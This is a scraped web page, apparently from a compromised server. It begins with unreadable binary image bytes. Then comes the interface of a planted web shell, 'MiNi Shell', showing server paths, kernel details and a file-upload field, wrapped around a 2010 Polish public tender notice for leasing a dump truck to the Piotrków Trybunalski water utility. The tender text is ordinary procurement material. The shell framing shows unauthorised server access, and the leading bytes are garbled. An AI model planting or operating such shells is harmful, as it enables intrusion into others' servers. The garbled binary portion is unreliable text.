JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100907/280804-N-2010.html

<p class="kh_header"><b>Piotrków Trybunalski: DOSTAWA SAMOCHODU CIĘŻAROWEGO FABRYCZNIE NOWEGO -
WYWROTKA TRÓJSTRONNA  DMC 18 T W FORMIE LEASINGU FINANSOWEGO</b><br>
<b>Numer ogłoszenia: 280804 - 2010; data zamieszczenia: 07.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Piotrkowskie Wodociągi i Kanalizacja Sp z o.o. , ul. Przemysłowa 4, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 44 646 15 66, faks 44 646 15 66.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwik.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego ze 100 % udziałem Miasta Piotrków Trybunalski.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SAMOCHODU CIĘŻAROWEGO FABRYCZNIE NOWEGO -
WYWROTKA TRÓJSTRONNA  DMC 18 T W FORMIE LEASINGU FINANSOWEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa samochodu ciężarowego fabrycznie nowego
w pełni sprawnego - wywrotka trójstronna  DMC 18 T w formie leasingu finansowego.

1. ZAKRES FINANSOWANIA (LEASINGU)
1) Ilość miesięcznych rat leasingowych - 36.
2) Założenia ekonomiczne:
a) każda rata leasingowa składa się z raty kapitałowej i czynszu. 
b) oprocentowanie w stosunku rocznym, oparte o wskaźnik WIBOR 3M, 
c) oprocentowanie oparte o walutę PLN,
d) wysokość ustalonej raty miesięcznej opłaty leasingowej ulegnie odpowiedniej zmianie w przypadku: 
- zmiany przepisów podatkowych, mających wpływ na obniżenie dochodowości  umowy leasingowej po stronie Finansującego; 
- zmiany stawki rynku bankowego, w zależności od waluty Umowy, WIBOR, LIBOR lub EURIBOR w Banku finansującym Umowę.
e) w przypadku nieterminowego zapłacenia raty leasingowej Finansujący będzie miał prawo do naliczenia odsetek w wysokości odsetek ustawowych za każdy dzień opóźnienia z płatnością. 
3) Zamawiający nie wyraża zgody na wprowadzenie kaucji zabezpieczających, opłat przedwstępnych, wstępnych, końcowych, prowizji przygotowawczej, opłat inicjalnych, opłat wykupu itp. Dopuszcza jedynie wprowadzenie opłaty manipulacyjnej do 2% wartości przedmiotu leasingu i udokumentowanych opłat dodatkowych w uzasadnionych przypadkach. 
4) Termin płatności miesięcznych rat leasingowych będzie przypadał na 20 dzień danego miesiąca lub następny dzień roboczy, jeżeli ostatni dzień zapłaty jest dniem wolnym. Przez dzień wolny rozumie się sobotę, niedzielę lub dzień ustawowo wolny od pracy.
5) W momencie uregulowania ostatniej raty leasingowej oraz wszystkich należnych opłat wynikających z Umowy nastąpi przeniesienie prawa własności przedmiotu leasingu na Zamawiającego, co zostanie potwierdzone oświadczeniem Stron.
6) Do wartości netto rat leasingowych (kapitałowych i odsetkowych) Finansujący doliczy podatek VAT, zgodnie z obowiązującymi przepisami. Podatek VAT zostanie uregulowany przez Zamawiającego w ciągu 7 dni od daty otrzymania prawidłowo wystawionej faktury VAT.
7) Należności wynikające z niniejszej umowy w tym odszkodowawcze i odsetkowe nie mogą być przedmiotem obrotu (cesja, sprzedaż), zgodnie z art. 509 Kc, bez pisemnej zgody Zamawiającego. Na pisemny wniosek Finansującego, Zamawiający wyrazi zgodę na zawarcie umowy przelewu wierzytelności, po przedstawieniu przez Finansującego wzoru umowy przelewu wierzytelności, zawierającej niżej wymienione warunki:
8) Przelew wierzytelności może być dokonany tylko i wyłącznie na instytucję finansującą przedmiotową umowę leasingu (np. bank, firma leasingowa, itp.) bez możliwości dalszego jej przenoszenia.
9) Przelew wierzytelności dotyczyć będzie tylko wierzytelności głównej (raty kapitałowe i odsetkowe powiększone o należny podatek VAT).
10) Ryzyko finansowe oraz koszty wynikające z zawartej umowy przelewu wierzytelności nie mogą być przeniesione na Zamawiającego.
11) Zamawiający lub Finansujący dokona ubezpieczenia przedmiotu leasingu na koszt Zamawiającego w okresie obowiązywania umowy leasingowej, tj. od dnia podpisania Protokołu przekazania przedmiotu leasingu do końca trwania umowy w zależności, które koszty ubezpieczenia będą niższe. Ubezpieczenie obejmować będzie ryzyka dla tego typu przedmiotu leasingu (AC+OC+NW).
12) Zamawiający lub Finansujący wyraża zgodę na cesję praw wynikających z polisy ubezpieczeniowej na instytucje finansujące niniejszą umowę leasingu bez możliwości dalszego jej przenoszenia.
13) Zamawiający zabezpieczy przedmiot leasingu  w formie weksla własnego in blaco wraz z deklaracją.
14) Przedmiot leasingu pozostaje własnością Finansującego przez cały okres leasingu.
15) Odpisów amortyzacyjnych w okresie trwania leasingu dokonuje Zamawiający.

2. Charakterystyka techniczna samochodu ciężarowego - wywrotka trójstronna  DMC 18 T w formie leasingu finansowego.

1)	Charakterystyka zabudowy
a)	Długość gabarytowa nadbudowy  wywrotki ok. 4700 mm
b)	Szerokość gabarytowa ok. 2500 mm
c)	Wysokość burt - nie większa niż 700 mm
d)	Podłoga 5 mm, stal 18 G2A
e)	Burty 3 mm, stal 18 G2A
f)	Burta przednia stała, prosta wysokość ok. 1000 mm 
g)	Burty boczne raz dzielone z dolnymi górnymi zawiasami
h)	Burta tylna z górnymi zawiasami, zamki dolne otwierane automatycznie
i)	Siłownik hydrauliczny podłogowy
j)	Pompa hydrauliczna
k)	Zbiornik oleju
l)	Sterowanie wywrotem pneumatycznie z kabiny
m)	Sygnalizacja podniesienia skrzyni na pulpicie w kabinie
n)	Bariery boczne aluminiowe
o)	Osłony świateł tylnych z uchylną kratką
p)	Plandeka zwijana na burcie przedniej szerokość ok. 2400 mm
q)	Uchwyty do mocowania ładunku 4 szt.
r)	Stopnie ułatwiające wejście na skrzynie
s)	Błotniki plastikowe na koła tylne pełne 
t)	Fartuchy p-błotne podwieszane na haczykach
u)	Żółte światła obrysowe 
v)	Tablice wyróżniające
w)	Oznaczenie konturowe


2)	Charakterystyka podwozia
a)	Kabina kierowcy dzienna
b)	Kabina ze wzmocnionym zawieszeniem mechanicznym 
c)	Mechaniczna blokada drzwi lewych i prawych, 2 komplety kluczyków 
d)	Immobilizer silnika z blokada wtrysku paliwa i przerwaniem obwodu rozrusznika
e)	Dwureflektorowe halogenowe światła przednie z odpornymi na uderzenia  
        kloszami, z regulatorem poziomu
f)	Reflektory przednie dla ruchu prawostronnego
g)	Lewostronny układ kierowniczy
h)	Wspomaganie układu kierowniczego
i)	Regulowana kolumna kierownicy 
j)	Podziałka prędkościomierza km/h + m/h
k)	Fabryczna aktywacja tachografu - wstępna kalibracja
l)	Osłona przeciwsłoneczna dla kierowcy i pasażera
m)	Akustyczny, ostrzegawczy sygnał cofania z wyłącznikiem bezpieczeństwa
n)	Oś przednia: rozmiar opon 295/80 R 22,5
o)	Oś tylna: rozmiar opon 295/80 R 22,5
p)	Koło zapasowe: rozmiar opon 295/80 R 22,5
q)	 Przednie zawieszenie paraboliczne
r)	Tylne zawieszenie paraboliczne
s)	Blokada mechanizmu różnicowego tylnej osi
t)	Stabilizator tylnej osi
u)	Silnik diesla o pojemności od 6,0 l - 9,0 l sześciocylindrowy rzędowy, układ 
        wtryskowy typu Common Rail o mocy min. 240 KM
v)	Ręczna skrzynia biegów, 9 biegów do przodu
w)	Fabryczna przystawka odbioru mocy
x)	Dwie osie typ (4x2) 6  kół 
y)	Układ hamulcowy z ABS
z)	Norma emisji spalin EURO 5
aa)	Stalowy zbiornik paliwa min. 150 l
bb)	Zamontowana belka ostrzegawcza zespolona składająca się z: dwóch
        bocznych lamp w kolorze pomarańczowym i wyświetlacza w kolorze białym
        z  napisem PWiK Sp. z o.o. na dachu samochodu
cc)	Gwarancja techniczna Wykonawcy na pojazd kompletny -  min. 24 m-ce
dd)	Błotniki z chlapaczami, zgodne z dyrektywą 9/226/EEC
ee)	Zabezpieczenie przed wjechaniem pod samochód ciężarowy (FUP) zgodnie z dyrektywą UE 2000/40/EEC
ff)	Standardowy zestaw narzędzi
gg)	Gaśnica polska 
hh)	Apteczka I pomocy
ii)	Odblaskowy trójkąt ostrzegawczy
jj)	Podnośnik hydrauliczny powyżej 10 T
kk)	Jeden klin pod koła
ll)	Instrukcja obsługi w języku polskim
mm)	Radio + głośniki

3) Pozostałe wymagania Zamawiającego dotyczące przedmiotu zamówienia

1) Świadectwo Homologacji Typu na pojazd skompletowany, kopia załączona do oferty.   
2) Wykaz zrealizowanych dostaw w okresie ostatnich trzech lat, odpowiadających rodzajowo i wartościowo przedmiotowi zamówienia, z podaniem odbiorców, wartości i terminu dostawy. Wymagane minimum pięć dostaw wraz z dokumentami potwierdzającymi realizację dostawy, np. referencje, protokoły zdawczo-odbiorcze, itp.
3) Autoryzowany serwis dla podwozia w odległości maksymalnie do 50 km od siedziby Zamawiającego.
4) Wykonawca zobowiązuje się zapewnić serwis gwarancyjny i pogwarancyjny oferowanego przedmiotu zamówienia. 
5) Gwarancja na przedmiot zamówienia min. 24 miesiące.
6) Przeglądy nadbudowy wykonywane będą w miejscu Zamawiającego.
7) Czas podjęcia naprawy podwozia lub nadbudowy w siedzibie Zamawiającego, nie więcej niż 24 godziny od chwili pisemnego  (fax, email) zgłoszenia. 
8) Wykonawca dostarczy przedmiot zamówienia do siedziby na własny koszt i odpowiedzialność, w terminie uzgodnionym przez strony oraz umożliwi jego sprawdzenie pod względem technicznym.
9) W przypadku wykonania naprawy przedmiotu zamówienia powyżej 14 dni, Wykonawca dostarczy lub zapewni samochód zastępczy o tych samych parametrach technicznych, co przedmiot zamówienia.
10) Przeszkolenie pracowników obsługi w zakresie eksploatacji pojazdu i BHP.
11) Przekaże niezbędne dokumenty przedmiotu zamówienia między innymi instrukcję obsługi w języku polskim, kartę gwarancyjną, katalog części zamiennych, Certyfikat CE itp., stosownie do obowiązujących przepisów prawa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.13.40.00-5, 66.11.40.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Finansujący musi przedstawić dokument, z którego wynika, że jest on uprawniony do prowadzenia działalności, w zakresie objętym przedmiotem zamówienia.
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Finansującego z Wykonawcą, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Finansującego z Wykonawcą z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Finansujący łącznie z Wykonawcą musi spełniać następujący warunek:
a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, wykonali/wykonują dostawy w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia.

Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Finansującego z Wykonawcą, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Finansującego z Wykonawcą z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W wykonywaniu gwarancyjnych czynności serwisowych będą uczestniczyć osoby posiadające odpowiednie kwalifikacje do wykonywania tych prac.
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Finansującego z Wykonawcą, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Finansującego z Wykonawcą z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W wykonywaniu gwarancyjnych czynności serwisowych będą uczestniczyć osoby posiadające odpowiednie kwalifikacje do wykonywania tych prac.
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Finansującego z Wykonawcą, zgodnych z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Finansującego z Wykonawcą z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W szczególności Finansujący musi spełniać następujący warunek:
1) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Finansujący jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - minimum na 500 000 zł. 
Ocena spełnienia wymaganych warunków odbywa się, zgodnie z regułą: spełnia albo nie spełnia, na podstawie dokumentów załączonych do oferty, przez Finansującego, zgodnych
z niniejszą SIWZ. Niespełnienie, chociażby jednego warunku skutkować będzie wykluczeniem Finansującego  z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwik.piotrkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PIOTRKOWSKIE WODOCIĄGI I KANALIZACJA SP. Z O.O.
UL. PRZEMYSŁOWA 4
97-300 PIOTRKÓW TRYBUNALSKI.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.09.2010 godzina 09:00, miejsce: PIOTRKOWSKIE WODOCIĄGI I KANALIZACJA SP. Z O.O.
UL. PRZEMYSŁOWA 4
97-300 PIOTRKÓW TRYBUNALSKI 
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 29.10.2010.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com